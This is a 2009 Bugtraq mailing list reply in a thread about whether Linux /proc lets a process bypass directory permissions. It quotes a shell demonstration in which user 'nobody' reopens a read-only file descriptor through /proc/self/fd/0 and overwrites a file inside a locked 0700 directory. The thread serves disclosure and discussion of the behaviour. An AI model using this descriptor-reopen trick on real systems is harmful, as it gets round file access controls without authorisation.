Bugtraq mailing list archives
Re: /proc filesystem allows bypassing directory permissions on Linux
From: Marco Verschuur <marco () osp nl>
Date: Fri, 30 Oct 2009 18:57:15 +0100
Jim, Sorry, but your 'prove' below is wrong! You are opening the locked down file as root and passing that fd as input to the nobody process. So nobody is not opening /dir/file.txt (he can't because he hasn't access to it via /dir) but root is... Therefor the write to the fd is failing, because you're passing a read-only file descriptor. Try to replay your scenario in separate shells, without the use of sudo and redirection. Best regards, Marco On 29 okt 2009, at 21:10, Jim Paris wrote:
0700 mode from the origin, you would be right, and procfs wouldn't allow opening files in that directory too, but if you let others to traverse that directory and open your believed to be secure files from the origin,it's your fault.I can do the example with fd passing and 700 directory, but it would be lot of C code. Feel free to play, my example was not nearly the only way to demonstrate it, and no, it was not racy.Here is an example that shows the behavior where a passed read-only fd can become read-write by reopening it through /proc, when file permissions allow it (but directory permissions do not): $ sudo su # mkdir -m 0700 /dir # echo "safe" > /dir/file.txt # chmod 0666 /dir/file.txt # ls -al /dir total 12 drwx------ 2 root root 4096 2009-10-29 00:28 . drwxr-xr-x 27 root root 4096 2009-10-29 00:28 .. -rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt # cat /dir/file.txt safe Now user "nobody" cannot read or write this file: # su nobody -c 'cat /dir/file.txt' sh: /dir/file.txt: Permission denied # su nobody -c 'echo "hacked" > /dir/file.txt' sh: /dir/file.txt: Permission denied # cat /dir/file.txt safe If we provide an open read-only file descriptor (as stdin, fd 0), they can read it: # su nobody -c 'cat <&0' < /dir/file.txt safe But they still can't write to this descriptor: # su nobody -c 'echo "hacked" >&0' < /dir/file.txt sh: line 0: echo: write error: Bad file descriptor Unless we re-open the file using the magic link in /proc: # su nobody -c 'echo "hacked" >/proc/self/fd/0' < /dir/file.txt # cat /dir/file.txt hacked Again, debatable whether this is a bug, but it's certainly non-obvious. There is no other way (that I'm aware) for the "nobody" user to gain write access to /dir/file.txt, even when given a read-only fd, without using /proc. -jim
Current thread:
- Re: /proc filesystem allows bypassing directory permissions on Linux, (continued)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 29)
- Re: /proc filesystem allows bypassing directory permissions on Linux Dan Yefimov (Oct 29)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 29)
- Re: /proc filesystem allows bypassing directory permissions on Linux Jim Paris (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Marco Verschuur (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Marco Verschuur (Oct 30)
- Message not available
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux psz (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Jim Paris (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Marco Verschuur (Oct 30)
- Re: /proc filesystem allows bypassing directory permissions on Linux Joel Maslak (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux psz (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux psz (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Dan Yefimov (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux psz (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Dan Yefimov (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Pavel Machek (Oct 26)
- Re: /proc filesystem allows bypassing directory permissions on Linux Dan Yefimov (Oct 26)